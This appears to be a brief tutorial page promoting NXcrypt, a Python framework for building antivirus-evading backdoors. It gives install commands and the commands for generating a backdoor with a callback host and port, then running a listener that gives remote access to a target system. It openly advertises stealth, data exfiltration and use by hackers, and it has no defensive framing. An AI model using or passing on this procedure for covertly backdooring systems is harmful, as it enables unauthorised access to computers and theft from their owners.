📅  最后修改于: 2023-12-03 15:03:20.145000             🧑  作者: Mango
NXcrypt is a Python backdoor framework that allows you to create, customize, and deploy backdoors easily. It is designed to be stealthy and to bypass most antivirus programs. With NXcrypt, you can create fully undetectable backdoors that can be used for remote access, data exfiltration, and more.
You can install NXcrypt via pip:
pip install nxcrypt
Alternatively, you can clone the GitHub repository and install it manually:
git clone https://github.com/nccgroup/nxcrypt.git
cd nxcrypt
python setup.py install
To use NXcrypt, you first need to create a backdoor. You can do this using the generate
command:
nxcrypt generate
This will generate a backdoor with the default settings. You can customize the backdoor by specifying various parameters:
nxcrypt generate --host <host> --port <port> --name <name> --icon <icon> --windows --linux
Once you have generated your backdoor, you can deploy it on a target system. To do this, you need to run the listener
command on your system:
nxcrypt listener --host <host> --port <port>
This will start a listener on your system. You can then run the backdoor on the target system, and it will connect to your listener. You will then have remote access to the target system.
NXcrypt is a powerful Python backdoor framework that allows you to create customized, stealthy backdoors easily. Whether you need remote access or data exfiltration, NXcrypt has you covered. With its easy-to-use interface and customizable options, NXcrypt is a must-have tool for any hacker or security professional.